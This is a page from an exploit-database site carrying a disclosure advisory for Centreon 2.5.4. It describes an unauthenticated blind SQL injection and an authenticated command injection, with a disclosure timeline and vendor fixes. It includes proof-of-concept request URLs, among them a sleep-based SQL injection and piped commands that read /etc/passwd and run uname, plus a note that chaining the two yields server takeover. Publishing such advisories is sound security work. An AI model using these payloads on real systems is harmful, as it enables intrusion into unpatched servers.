0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Centreon 2.5.4 - Multiple Vulnerabilities
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Merethis Centreon - Unauthenticated blind SQLi and Authenticated Remote Command Execution CVEs: CVE-2015-1560, CVE-2015-1561 Vendor: Merethis - www.centreon.com Product: Centreon Version affected: 2.5.4 and prior Product description: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. (from https://www.centreon.com/en/) Advisory introduction: Centron 2.5.4 is susceptible to multiple vulnerabilities, including unauthenticated blind SQL injection and authenticated remote system command execution. Credit: Huy-Ngoc DAU of Deloitte Conseil, France ================================ Finding 1: Unauthenticated Blind SQL injection in isUserAdmin function (CVE-2015-1560) ================================ Vulnerable function is "isUserAdmin" (defined in include/common/common-Func.php), in which unsanitized "sid" GET parameter is used in a SQL request. PoC: https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si d=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27 https://example.domain/centreon/include/common/XmlTree/GetXmlTree.php?si d=%27%2Bif(1%3C0,sleep(1),%27%27)%2B%27 By exploiting CVE-2015-1560, an attacker can obtain among others a valid session_id, which is required to exploit CVE-2015-1561. ================================ Finding 2: Authenticated Command Execution in getStats.php (CVE-2015-1561) ================================ $command_line variable, which is passed to popen function, is constructed using unsanitized GET parameters. PoC (a valid session_id value is required): - Reading /etc/passwd by injecting command into "ns_id" parameter: http://example.domain/centreon/include/Administration/corePerformance/ge tStats.php?ns_id=|+more+/etc/passwd+%23&key=active_service_check&start=t oday&session_id=[valid session_id] - Injecting "uname ?a" into "end" parameter: http://example.domain/centreon/include/Administration/corePerformance/ge tStats.php?ns_id=1&key=active_service_check&start=today&end=|+uname+-a+% 23&session_id=[valid session_id] Combining two vulnerabilities, an unauthenticated attacker can take control of the web server. ================================ Timeline ================================ 26/01/2015 - Vulnerabilities discovered 29/01/2015 - Vendor notified 05/02/2015 - Vendor fixed SQLi 13/02/2015 - Vendor fixed RCE References Vendor fixes: - SQLi : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21 3b9c60de1bad0b464fd6403c828cf12582 - Command execution : https://forge.centreon.com/projects/centreon/repository/revisions/d14f21 3b9c60de1bad0b464fd6403c828cf12582 # 0day.today [2024-11-16] #